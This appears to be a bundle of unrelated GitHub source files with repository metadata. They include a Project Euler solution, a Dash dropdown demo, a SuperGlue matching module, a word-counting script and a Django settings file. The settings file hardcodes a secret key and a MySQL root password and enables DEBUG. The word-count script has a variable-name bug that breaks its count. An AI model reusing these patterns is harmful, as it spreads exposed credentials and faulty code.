f5c8c797de9a291d4cadce9ee6ba97aafa3cb8dd | 6545040ba6bf07cdd104e1482dabdec0965f9ac7 | /S12/tensornet/data/__init__.py | e2a15219734f5f2bef567518d43095e50fcdf001 | [] | no_license | rvk007/EVA4 | 785394ecbc41a7ecadee44f8ba8a41464762332a | d0c99802a9a2a501c74b8503a3552838d3ce8b27 | refs/heads/master | 2022-08-12T18:22:21.691073 | 2021-10-13T05:27:52 | 2021-10-13T05:27:52 | 239,499,002 | 1 | 3 | null | 2022-06-22T01:42:08 | 2020-02-10T11:46:50 | Jupyter Notebook | UTF-8 | Python | false | false | 50 | py | from .datasets import CIFAR10, MNIST, TinyImageNet | [
"rksharma19896@gmail.com"
] | rksharma19896@gmail.com |
e5e42b8c0aac6428f96b5147ff8e835c3a03c930 | 49390a33a654b3dc4d44fcae6fa3755878f3d6b9 | /qklnn/plots/quickslicer_dummy_net.py | f1aa155c2fe9cdab853d3edbd42769cd290a17bc | [
"MIT"
] | permissive | cambouvy/BSc-Thesis-Project | 4b792d1ded3b3df02fb08694ca4c27cbed2f59ef | ca2504cb828ab068545e130eac393ceb34f2a457 | refs/heads/main | 2023-08-05T08:01:52.156776 | 2021-09-23T20:51:35 | 2021-09-23T20:51:35 | 409,731,196 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,443 | py | """ quickslicer Neural Network specification
This file should be importable from the quickslicer and define three things:
nns: A dictionary-like object containing the neural networks. Each network
should have some basic attributes, a full description is outside the
scope, but if its a QuaLiKizNDNN you are usually set.
slicedim: The dimension (string) that should be sliced over. Should exist
and as input feature of the network in the to-be-sliced 'input' leaf
style: The style of slicing, usually just corrosponds to the output dimensions,
but its partially implemented to e.g. slice 1D output from a 3D output network.
Should be one of 'mono' 'duo' or 'triple'
"""
from collections import OrderedDict
import os
nns = OrderedDict()
# Example pulling a bunch of networks from the NNDB
# from qlknn.NNDB.model import Network
# dbnns = []
# labels = []
# dbnns.append(Network.get_by_id(1723))
# for ii, dbnn in enumerate(dbnns):
# net = dbnn.to_QuaLiKizNN()
# if len(labels) == 0:
# net.label = '_'.join([str(el) for el in [dbnn.__class__.__name__ , dbnn.id]])
# else:
# net.label = labels[ii]
# nns[net.label] = net
# Example using a bunch of on-disk 'Phillip' style late-fusion Neural Networks from disk
# from qlknn.models.kerasmodel import NDHornNet
# network_root = '/home/philipp/Documents/Job/NeuralNets/thirdNets'
# network_names = ['ITG']
#
# for network_name in network_names:
# # Warning! If you use the name 'nn', Keras won't be able to load the network..
# net = NDHornNet(os.path.join(network_root, network_name, 'nn.json'))
# net.label = network_name
# nns[net.label] = net
# Example setting up QuaLiKizNDNN from tests
from qlknn.models.ffnn import QuaLiKizNDNN, QuaLiKizComboNN
root = os.path.dirname(os.path.realpath(__file__))
net_path = os.path.join(root, "../../tests/gen3_test_files/Network_874_efiITG_GB/nn.json")
net = QuaLiKizNDNN.from_json(net_path)
net.label = "Network_874"
nns[net.label] = net
# Example setting up QuaLiKiz4DNN from disk
# from qlkANNk import QuaLiKiz4DNN
# nns['4D'] = QuaLiKiz4DNN()
# nns['4D'].label = '4D'
# nns['4D']._target_names = ['efeITG_GB', 'efiITG_GB']
# Set the slice dim manually based on target names
slicedim = "Ati"
if len(net._target_names) == 1:
style = "mono"
elif len(net._target_names) == 2:
style = "duo"
elif len(net._target_names) == 3:
style = "triple"
| [
"noreply@github.com"
] | cambouvy.noreply@github.com |
b3e4b05edc296bd9ee9a63e53dc7385f87c7318f | 8e6b8bf00313350eee305d34eea692cd3c05f2e0 | /No11.py | 18dccdb76b59f27b8ad66afd10481392524b7d8f | [] | no_license | gatakaba/project_euler | 316b3da9d1a5f6bbf5793fbedcdf15401aa4eba1 | e600bc8beaee3dbf72c0bdbef0e324c382236582 | refs/heads/master | 2021-01-20T18:24:44.799035 | 2016-08-01T08:52:07 | 2016-08-01T08:52:07 | 64,651,506 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,446 | py | # coding:utf-8
"""
In the 20×20 grid below, four numbers along a diagonal line have been marked in red.
08 02 22 97 38 15 00 40 00 75 04 05 07 78 52 12 50 77 91 08
49 49 99 40 17 81 18 57 60 87 17 40 98 43 69 48 04 56 62 00
81 49 31 73 55 79 14 29 93 71 40 67 53 88 30 03 49 13 36 65
52 70 95 23 04 60 11 42 69 24 68 56 01 32 56 71 37 02 36 91
22 31 16 71 51 67 63 89 41 92 36 54 22 40 40 28 66 33 13 80
24 47 32 60 99 03 45 02 44 75 33 53 78 36 84 20 35 17 12 50
32 98 81 28 64 23 67 10 26 38 40 67 59 54 70 66 18 38 64 70
67 26 20 68 02 62 12 20 95 63 94 39 63 08 40 91 66 49 94 21
24 55 58 05 66 73 99 26 97 17 78 78 96 83 14 88 34 89 63 72
21 36 23 09 75 00 76 44 20 45 35 14 00 61 33 97 34 31 33 95
78 17 53 28 22 75 31 67 15 94 03 80 04 62 16 14 09 53 56 92
16 39 05 42 96 35 31 47 55 58 88 24 00 17 54 24 36 29 85 57
86 56 00 48 35 71 89 07 05 44 44 37 44 60 21 58 51 54 17 58
19 80 81 68 05 94 47 69 28 73 92 13 86 52 17 77 04 89 55 40
04 52 08 83 97 35 99 16 07 97 57 32 16 26 26 79 33 27 98 66
88 36 68 87 57 62 20 72 03 46 33 67 46 55 12 32 63 93 53 69
04 42 16 73 38 25 39 11 24 94 72 18 08 46 29 32 40 62 76 36
20 69 36 41 72 30 23 88 34 62 99 69 82 67 59 85 74 04 36 16
20 73 35 29 78 31 90 01 74 31 49 71 48 86 81 16 23 57 05 54
01 70 54 71 83 51 54 69 16 92 33 48 61 43 52 01 89 19 67 48
The product of these numbers is 26 × 63 × 78 × 14 = 1788696.
What is the greatest product of four adjacent numbers in the same direction (up, down, left, right, or diagonally) in the 20×20 grid?
"""
matrix = """08 02 22 97 38 15 00 40 00 75 04 05 07 78 52 12 50 77 91 08
49 49 99 40 17 81 18 57 60 87 17 40 98 43 69 48 04 56 62 00
81 49 31 73 55 79 14 29 93 71 40 67 53 88 30 03 49 13 36 65
52 70 95 23 04 60 11 42 69 24 68 56 01 32 56 71 37 02 36 91
22 31 16 71 51 67 63 89 41 92 36 54 22 40 40 28 66 33 13 80
24 47 32 60 99 03 45 02 44 75 33 53 78 36 84 20 35 17 12 50
32 98 81 28 64 23 67 10 26 38 40 67 59 54 70 66 18 38 64 70
67 26 20 68 02 62 12 20 95 63 94 39 63 08 40 91 66 49 94 21
24 55 58 05 66 73 99 26 97 17 78 78 96 83 14 88 34 89 63 72
21 36 23 09 75 00 76 44 20 45 35 14 00 61 33 97 34 31 33 95
78 17 53 28 22 75 31 67 15 94 03 80 04 62 16 14 09 53 56 92
16 39 05 42 96 35 31 47 55 58 88 24 00 17 54 24 36 29 85 57
86 56 00 48 35 71 89 07 05 44 44 37 44 60 21 58 51 54 17 58
19 80 81 68 05 94 47 69 28 73 92 13 86 52 17 77 04 89 55 40
04 52 08 83 97 35 99 16 07 97 57 32 16 26 26 79 33 27 98 66
88 36 68 87 57 62 20 72 03 46 33 67 46 55 12 32 63 93 53 69
04 42 16 73 38 25 39 11 24 94 72 18 08 46 29 32 40 62 76 36
20 69 36 41 72 30 23 88 34 62 99 69 82 67 59 85 74 04 36 16
20 73 35 29 78 31 90 01 74 31 49 71 48 86 81 16 23 57 05 54
01 70 54 71 83 51 54 69 16 92 33 48 61 43 52 01 89 19 67 48"""
import operator
def calc_mul(l):
return reduce(operator.mul, l)
l = matrix.split("\n")
x = map(lambda x: x.split(" "), l)
import numpy as np
x = np.array(x, dtype=int)
product_list = []
# check row
for i in range(20):
for j in range(17):
product_list.append(calc_mul(x[i, j:j + 4]))
# check column
for i in range(17):
for j in range(20):
product_list.append(calc_mul(x[i:i + 4, j]))
for i in range(17):
for j in range(17):
rect = x[i:i + 4, j:j + 4]
# check right diagonal
product_list.append(calc_mul(np.diag(rect)))
# check left diagonal
product_list.append(calc_mul(np.diag(np.rot90(rect))))
print max(product_list) | [
"m07112@gmail.com"
] | m07112@gmail.com |
b6c2ce08804c66b293ae4e13ba70f17d93dcfbed | 5465ed0ea2401a8e70d4bbc0ce1e78ca26813c54 | /Dash/example_dropdown.py | 432c0e12326a232ef545016451102df8cf8aca00 | [] | no_license | josephchenhk/learn | 36c49ceb7c8cf8f944ad401b2c7adabf688981a1 | b216bb17570e272555e9da475e4c85eb18139c2a | refs/heads/master | 2023-09-01T04:22:00.984837 | 2023-08-20T01:00:01 | 2023-08-20T01:00:01 | 178,778,957 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 635 | py | # -*- coding: utf-8 -*-
# @Time : 29/3/2021 3:41 PM
# @Author : Joseph Chen
# @Email : josephchenhk@gmail.com
# @FileName: example_dropdown.py
# @Software: PyCharm
import dash
import dash_html_components as html
import dash_core_components as dcc
app = dash.Dash(__name__)
app.layout = html.Div(
[
html.H1('Selection'),
html.Br(),
dcc.Dropdown(
options=[
{'label': 'option 1', 'value': 1},
{'label': 'option 2', 'value': 2},
{'label': 'option 3', 'value': 3}
]
)
]
)
if __name__=="__main__":
app.run_server()
| [
"josephchenhk@gmail.com"
] | josephchenhk@gmail.com |
783560f6030d496ca56583f01bdacc4cd5a3355f | c45da2c867db1872df2e2a6603bdf7026fd5fb15 | /models_S/matching.py | 06f1ac9de41f4d1029b1999d12f908ca908bc579 | [] | no_license | LexaNagiBator228/Fast-Feature-Matching-with-Linear-Transformers | 42dcb72207f5a43302e69b948592c53f993fc86c | f0ce2ade189a11ab5d9284cbc6a698de93ec5b61 | refs/heads/main | 2023-06-15T15:19:41.130039 | 2021-07-13T13:55:00 | 2021-07-13T13:55:00 | 384,940,145 | 13 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,998 | py | # %BANNER_BEGIN%
# ---------------------------------------------------------------------
# %COPYRIGHT_BEGIN%
#
# Magic Leap, Inc. ("COMPANY") CONFIDENTIAL
#
# Unpublished Copyright (c) 2020
# Magic Leap, Inc., All Rights Reserved.
#
# NOTICE: All information contained herein is, and remains the property
# of COMPANY. The intellectual and technical concepts contained herein
# are proprietary to COMPANY and may be covered by U.S. and Foreign
# Patents, patents in process, and are protected by trade secret or
# copyright law. Dissemination of this information or reproduction of
# this material is strictly forbidden unless prior written permission is
# obtained from COMPANY. Access to the source code contained herein is
# hereby forbidden to anyone except current COMPANY employees, managers
# or contractors who have executed Confidentiality and Non-disclosure
# agreements explicitly covering such access.
#
# The copyright notice above does not evidence any actual or intended
# publication or disclosure of this source code, which includes
# information that is confidential and/or proprietary, and is a trade
# secret, of COMPANY. ANY REPRODUCTION, MODIFICATION, DISTRIBUTION,
# PUBLIC PERFORMANCE, OR PUBLIC DISPLAY OF OR THROUGH USE OF THIS
# SOURCE CODE WITHOUT THE EXPRESS WRITTEN CONSENT OF COMPANY IS
# STRICTLY PROHIBITED, AND IN VIOLATION OF APPLICABLE LAWS AND
# INTERNATIONAL TREATIES. THE RECEIPT OR POSSESSION OF THIS SOURCE
# CODE AND/OR RELATED INFORMATION DOES NOT CONVEY OR IMPLY ANY RIGHTS
# TO REPRODUCE, DISCLOSE OR DISTRIBUTE ITS CONTENTS, OR TO MANUFACTURE,
# USE, OR SELL ANYTHING THAT IT MAY DESCRIBE, IN WHOLE OR IN PART.
#
# %COPYRIGHT_END%
# ----------------------------------------------------------------------
# %AUTHORS_BEGIN%
#
# Originating Authors: Paul-Edouard Sarlin
#
# %AUTHORS_END%
# --------------------------------------------------------------------*/
# %BANNER_END%
import torch
from .superpoint import SuperPoint
from .superglue import SuperGlue
import time
class Matching(torch.nn.Module):
""" Image Matching Frontend (SuperPoint + SuperGlue) """
def __init__(self, config={}):
super().__init__()
self.superpoint = SuperPoint(config.get('superpoint', {}))
self.superglue = SuperGlue(config.get('superglue', {}))
#starter, ender = torch.cuda.Event(enable_timing=True), torch.cuda.Event(enable_timing=True)
def forward(self, data):
""" Run SuperPoint (optionally) and SuperGlue
SuperPoint is skipped if ['keypoints0', 'keypoints1'] exist in input
Args:
data: dictionary with minimal keys: ['image0', 'image1']
"""
pred = {}
#starter, ender = torch.cuda.Event(enable_timing=True), torch.cuda.Event(enable_timing=True)
# Extract SuperPoint (keypoints, scores, descriptors) if not provided
if 'keypoints0' not in data:
pred0, _ = self.superpoint({'image': data['image0']}, data['image0'])
pred = {**pred, **{k+'0': v for k, v in pred0.items()}}
if 'keypoints1' not in data:
pred1, _ = self.superpoint({'image': data['image1']},data['image1'] )
pred = {**pred, **{k+'1': v for k, v in pred1.items()}}
# Batch all features
# We should either have i) one image per batch, or
# ii) the same number of local features for all images in the batch.
#t = time.time()
#torch.cuda.synchronize()
#starter.record()
data = {**data, **pred}
for k in data:
if isinstance(data[k], (list, tuple)):
data[k] = torch.stack(data[k])
t= time.time()
#torch.cuda.synchronize()
#starter.record()
# Perform the matching
pred = {**pred, **self.superglue(data)}
#ender.record()
t1 = time.time() - t
#t1 = starter.elapsed_time(ender)
print('time super', t1)
print('Hz super', 1/t1)
return pred, t1
| [
"doctorthenord@gmail.com"
] | doctorthenord@gmail.com |
044f8d28a47038da7b2ce3e832b4c7b7fe81e91d | 0cb29aebd2db7c9109ea5f88c1f955ea94bdb629 | /CountingWords.py | ad86961a33be6aa58a3245e51291486dfe2b39b1 | [] | no_license | VIJAYZARGO/c97 | 58f405184a998a6ebb80882b926b17eb574827d2 | 16d33876b874f740f3f4ae2d30539879def1f338 | refs/heads/main | 2023-05-05T13:35:55.216179 | 2021-05-27T10:24:21 | 2021-05-27T10:24:21 | 371,333,176 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 353 | py | Intro = input("Enter your Introduction : ")
WordCount = 1
CharacterCount = 0
for Character in Intro:
CharacterCount = CharacterCount + 1
if(Character ==' '):
wordCount = WordCount + 1
print("Number of words in the string : ")
print(wordCount)
print("Number of Characters in the String : ")
print(CharacterCount) | [
"noreply@github.com"
] | VIJAYZARGO.noreply@github.com |
fb766b2ce7d1f7d85c3afa516ea547ba10ff3c26 | 923d446c5068e24e7ba94c3ffc9d2628334d7620 | /software/software/urls.py | 638318c82644ca212da0ffec7ea0e572681d0c54 | [] | no_license | FncAriel/GestordeArchivos | bd18bd80bf9dab2649769728be446ed6e459aacc | 9da8e5722d81f250bf399ef9b08c8031696ac44f | refs/heads/master | 2020-06-10T04:36:14.063014 | 2019-08-16T22:25:03 | 2019-08-16T22:25:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 824 | py | """software URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('apps.planos.urls')),
]
| [
"noreply@github.com"
] | FncAriel.noreply@github.com |
c52183b9689e7f5b9605278ebd70320785d7081f | 1b56e3902b66fe138483d5e4d08bdb04d3d7572c | /AMDB/settings.py | f41c5e5b1455c1322b5b1f5052fa4ec037679546 | [] | no_license | Sanskar-Jain/AMDB | 06f2fe535b7679a7ef763301a6e4ad7a93616866 | c01f76dc63f7fdb80656e20cc9ebc4dd63b1a0ca | refs/heads/master | 2021-01-20T05:36:28.264260 | 2017-04-29T18:34:34 | 2017-04-29T18:34:34 | 89,517,880 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,379 | py | """
Django settings for AMDB project.
Generated by 'django-admin startproject' using Django 1.11.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '4z=q-j3^6@fokpm!ypkvzy1*5sb=sykths!%@!bj11yb+-+nr1'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'users',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'AMDB.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'AMDB.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'amdb',
'USER': 'root',
'PASSWORD': 'abcde12345',
'PORT': '3306',
'HOST': 'localhost', # Or an IP Address that your DB is hosted on.
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
| [
"sanskar27jain@gmail.com"
] | sanskar27jain@gmail.com |
a1a98084660cc501acd49cdd15981bc58431cd34 | 88ae634164c891ecbf7d7055b821fe0d71d84b1c | /pyproject/ctpdata/db/workspace/test20151004.py | cb8f9acceb9690359fc819b03a16630b1caeed3a | [] | no_license | fuckfuckfuckfuck/bin | 6d13cf25ba4cd3ab9a81ca39ed0d483804aa678b | 47dfb24c3b8564a65408affbaa775b04e9de8f5a | refs/heads/master | 2021-01-10T11:09:07.838840 | 2015-12-05T15:06:18 | 2015-12-05T15:06:18 | 47,460,286 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 303 | py | import test20151004polymorphism
class nDuck(test20151004polymorphism.Duck):
## inheritance && init
def __init__(self):
test20151004polymorphism.Duck()
print("inited.")
## redefine
def quack(self):
test20151004polymorphism.Duck.quack(self)
print("nDuck quack")
| [
"wchongyang@foxmail.com"
] | wchongyang@foxmail.com |
4e6436b92bf15308d8bad82a429263914f1b602f | a32e964877786a7c186682ead221f84155f6cf5e | /R-MT/keras/parserTools.py | 3bf197ad8e59c554d805d250a50442caf1ca97fc | [] | no_license | likufanele/universalwsd | a1fa1a9c46be61f5257c3e1f0e5eda34b33125e0 | 135a15e7412e6f206a5ee93a1082b96ca7c88ae2 | refs/heads/master | 2020-12-20T14:01:52.077356 | 2020-01-24T23:46:09 | 2020-01-24T23:46:09 | 236,101,761 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,026 | py | import numpy as np
import re
import string
from vectorOperations import sumVectors, getVectorModel, mergeVectors, distanciaE, getListVectors
def splitOrationsAndPad(key,listsWords,vectorsSet,translator,modelV,size):
counterOrations=0
#print(len(listsWords))
sizeLen=15
translator=str.maketrans('','',string.punctuation)
for listWords in listsWords:
#print(counterOrations)
if(counterOrations<2):
filtredListWords=re.sub('[,.;:]', '', listWords)
tupleWords=tuple(filtredListWords.split())
newVectorDef=getListVectors(tupleWords,translator,modelV,size)
counterOrations+=1
try:
size,length=newVectorDef.shape
except:
size=newVectorDef.shape
size=size[0]
length=1
if (key in vectorsSet):
#print("existe clave")
if(length<sizeLen):
#print("less 70, and existing key")
if(length!=1):
vectorsSet[key].append(np.append(newVectorDef, np.zeros((size,(sizeLen-length)),dtype=np.float32), axis=1))
else:
#print(np.column_stack([newVectorDef,np.zeros((size,(69)))]))
vectorsSet[key].append(np.column_stack([newVectorDef,np.zeros((size,(49)))])) #sizelen-1
else:
#print("error when is more 70")
vectorsSet[key].append(newVectorDef[:,0:50])
else:
#print("from right to left",length)
#from right to left
if(length<sizeLen):
#print("less like 70")
if(length!=1):
bufferV=np.append(newVectorDef, np.zeros((size,(sizeLen-length)),dtype=np.float32), axis=1)
else:
bufferV=np.column_stack([newVectorDef,np.zeros((size,(49)))]) #sizelen-1
vectorsSet[key]=[np.flip(bufferV,1)]
else:
#print("se anexa clave",newVectorDef.shape)
inverseVector=np.flip(newVectorDef,1)
vectorsSet[key]=[inverseVector[:,-50:]]
else:
break
def splitOrationsAndPadB(key,listsWords,vectorsSet,sizeLen,modelV,size):
counterOrations=0
#sizeLen=15
translator=str.maketrans('','',string.punctuation)
for listWords in listsWords:
#print(counterOrations)
if(counterOrations<2):
filtredListWords=re.sub('[,.;:]', '', listWords)
tupleWords=tuple(filtredListWords.split())
#3print(tupleWords)
newVectorDef=getListVectors(tupleWords,translator,modelV,size) ##remember change column for row
counterOrations+=1
try:
length,size=newVectorDef.shape
except:
sizeD=newVectorDef.shape
size=sizeD[0]
length=1
if (key in vectorsSet):
#print("left side",tupleWords )
if(length<sizeLen):
#print("less 70, and existing key")
if(length!=1):
newVectorDef=np.append(newVectorDef, np.zeros(((sizeLen-length),size),dtype=np.float32), axis=0)
newVectorDef=np.flipud(newVectorDef)
vectorsSet[key].append(newVectorDef)
else:
#print(np.column_stack([newVectorDef,np.zeros((size,(69)))]))
vectorsSet[key].append(np.row_stack([newVectorDef,np.zeros(((sizeLen-1),size))]))
else:
newVectorDef=newVectorDef[0:sizeLen,:]
newVectorDef=np.flipud(newVectorDef)
vectorsSet[key].append(newVectorDef)
#import pdb; pdb.set_trace()
else:
#print("right side",tupleWords )
if(length<sizeLen):
#print("less like 5")
#testS.append(list(tupleWords))
if(length!=1):
#print("right side",tupleWords)
#print(list(tupleWords[-sizeLen:]))
#import pdb; pdb.set_trace()
bufferV=np.zeros(((sizeLen-length),size),dtype=np.float32)
bufferV=np.append(bufferV,newVectorDef, axis=0)
#for i in range(0,(sizeLen-length)):
# testS.append(' ')
else:
bufferV=np.row_stack([np.zeros(((sizeLen-1),size)),newVectorDef])
#for i in range(0,(sizeLen-1)):
# testS.append(' ')
#print("rightSide",tupleWords)
#print(tupleWords[-sizeLen:])
#import pdb; pdb.set_trace()
vectorsSet[key]=[bufferV[-sizeLen:]] #np.flip(bufferV,0)]
else:
#print("se anexa clave")
#inverseVector=bufferV[-sizeLen:] #np.flip(newVectorDef,0)
vectorsSet[key]=[newVectorDef[-sizeLen:]]#[inverseVector[-sizeLen:,:]]
#print(tupleWords,tupleWords[-sizeLen:])
#import pdb; pdb.set_trace()
else:
#import pdb; pdb.set_trace()
break
partsKey=key.split('.')
vectorsSet[key].append(getVectorModel(partsKey[0],modelV))
#import pdb; pdb.set_trace()
def fillVectorsDefinition(vectorsDefinitions, senseDict,modelVectors,size):
print("filled vectors def",datetime.datetime.now())
translator=str.maketrans('','',string.punctuation)
counter=0
for word in senseDict:
definitions=senseDict[word]
localVectorsDefinitions={}
for definition in definitions:
instanceDefinition=definitions[definition]
instanceDefinition=instanceDefinition.replace(" n't","n't")
listWords=instanceDefinition.split()
tupleWords=tuple(listWords)
vectorDefinition=mergeVectors(translator, tupleWords, modelVectors, size)
localVectorsDefinitions[definition]=vectorDefinition
vectorsDefinitions[word]=localVectorsDefinitions
sleep(0.01)
#######################################################
print("filled vectors def",datetime.datetime.now())
| [
"noreply@github.com"
] | likufanele.noreply@github.com |
ca5675e6ff4c7c0059f8b1343a3866ce8ea68269 | 422cc95ddef1f66f35b9037186d78e3c708b4730 | /A1_PS7_INT_143.py | f77e09cb3bab22057098e22ac38c1549ee840ec7 | [] | no_license | manojbalaji1/interpreters | 4ebe34bd7559b76075eabed27cfc6debd66f5ae6 | aed7b228e305a55a9b6094d80b1d69c8990245d8 | refs/heads/master | 2020-12-09T05:46:47.709018 | 2020-01-12T17:31:40 | 2020-01-12T17:31:40 | 233,211,211 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,083 | py | from Interpreter.interpreters import interPretr
open('outputPS7.txt', 'w').close()
interp = interPretr()
interp.readApplications(inputfile="inputPS7.txt")
interp.showAll()
# interp.displayCandidates("Hindi")
with open("promptsPS7.txt") as promptfile:
for line in promptfile:
print(line)
data = line.strip().split(":")
if data[0].strip() == "showMinList":
try:
interp.displayHireList()
except Exception as e:
pass
elif data[0].strip() == "searchLanguage":
try:
interp.displayCandidates(data[1].strip())
except Exception as e:
pass
elif data[0].strip() == "DirectTranslate":
try:
interp.findDirectTranslator(data[1].strip(), data[2].strip())
except Exception as e:
pass
elif data[0].strip() == "TransRelation":
try:
interp.findTransRelation(data[1].strip(), data[2].strip())
except Exception as e:
pass
| [
"manojbalaji1@gmail.com"
] | manojbalaji1@gmail.com |
0b6e59dc34a33b978dbcf8b8704dd35cdf33c4d7 | f97a38640cce46a0fa4f2e4c05590004cde14d61 | /projectTS/modeControl/automaticFlexibleTime.py | d5e522fff3913cae6daf005105a5ec1dae1889c4 | [] | no_license | nch101/thesis-traffic-signal-control | bb9dcb43836e69fc4cd5954119b58fe74a03b445 | b3bd1676fb2ab440b74d6d7a1846bd4ce6cc4c63 | refs/heads/master | 2023-08-31T11:29:19.415019 | 2020-08-17T05:07:10 | 2020-08-17T05:07:10 | 249,964,030 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,102 | py | # ** automatic control mode **
# * Author: Nguyen Cong Huy *
# ****************************
# - *- coding: utf- 8 - *-
import projectTS.vals as vals
def automaticFlexibleTime():
for index in range(0, vals.nTrafficLights):
if index%2:
setTimeLight(vals.timeGreenFlexibleNS, vals.timeGreenFlexibleWS, index)
else:
setTimeLight(vals.timeGreenFlexibleWS, vals.timeGreenFlexibleNS, index)
def setTimeLight(timeGreen, timeGreenForTimeRed, index):
if ((vals.timeLight[index] == -1) and \
(vals.lightStatus[index] == 'red')):
vals.timeLight[index] = timeGreen
vals.lightStatus[index] = 'green'
elif ((vals.timeLight[index] == -1) and \
(vals.lightStatus[index] == 'yellow')):
vals.timeLight[index] = timeGreenForTimeRed + vals.timeYellow[index] + 2*vals.delta + 3
vals.lightStatus[index] = 'red'
elif ((vals.timeLight[index] == -1) and \
(vals.lightStatus[index] == 'green')):
vals.timeLight[index] = vals.timeYellow[index]
vals.lightStatus[index] = 'yellow'
else:
pass | [
"="
] | = |
05a5ef1ddbad0e04df9d97f7d78e59f394d2112c | 56f89cdca74e14a1b8abcf8ac0a8ddd3247d58fe | /group20_final/podcast_app/urls.py | 7914caf0305d7efc52c438da7b3e81c17f1c31dc | [] | no_license | jack-rg/TweetAlong | 8fae6dba0a469fe0611dfba22e135993578953e4 | c4bf04c353e39d2ad0ae581b811084c202183895 | refs/heads/main | 2023-04-04T02:32:50.851358 | 2020-12-14T20:46:12 | 2020-12-14T20:46:12 | 360,310,793 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 180 | py | from django.urls import path
from . import views
urlpatterns = [
path('', views.home, name='podcast_app-home'),
path('tracks/', views.tracks, name='podcast_app-tracks')
] | [
"seanmed@bu.edu"
] | seanmed@bu.edu |
85ffa8e81eb472eac232b29cbb255545922873d2 | 1f5688a178ef1e21d4e449a0a7a97fc67f5ce218 | /venv/Scripts/easy_install-3.8-script.py | a74a204433cf7747ce98c87e7338f4529d085f56 | [] | no_license | St4n89/spendings-at-gui | f974cd08fdf520db81c353576069b24a801c7377 | 895cc2dfe75da5c0620b53510e7c53984a5718da | refs/heads/master | 2020-12-23T14:04:26.544239 | 2020-01-30T09:38:04 | 2020-01-30T09:38:04 | 237,174,806 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 440 | py | #!D:\Python\gui-svetik\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install-3.8'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install-3.8')()
)
| [
"stas.sirash@gmail.com"
] | stas.sirash@gmail.com |
